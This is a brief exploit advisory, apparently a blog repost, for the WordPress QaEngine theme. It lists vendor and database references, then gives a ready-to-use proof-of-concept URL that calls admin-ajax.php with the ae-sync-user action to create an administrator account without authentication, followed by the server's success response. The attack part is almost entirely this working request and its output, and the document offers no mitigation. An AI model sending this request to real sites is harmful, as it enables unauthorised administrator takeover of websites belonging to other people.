WordPress QaEngine Theme - Add Administrator




#- Title: WordPress QaEngine Theme - Add Administrator
#- Author: A. Samman
#- URL : research.evex.pw/?vuln=10
#- Date: 04/06/2015
#- Vendor: enginethemes.com
#- Download Link: enginethemes.com/themes/qaengine/
#- References :
#- OSVDB : 121267 
#- PACKETSTORM : 131648
#- WPVDB ID : 7885
#- Description : QAEngine vulnerability allows an attacker to have an administrator account on the target's website.

--------------------------------------------------------------------------------------
Proof of Concept :

http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=xADMIN&user_pass=xPASS&role=administrator

Response : {"success":true,"data":{"action":"ae-sync-user","user_login":"xADMIN","user_pass":"xPASS","role":"administrator","ID":5},"msg":"Update
user successful!"}



0 Response to "WordPress QaEngine Theme - Add Administrator"

Posting Komentar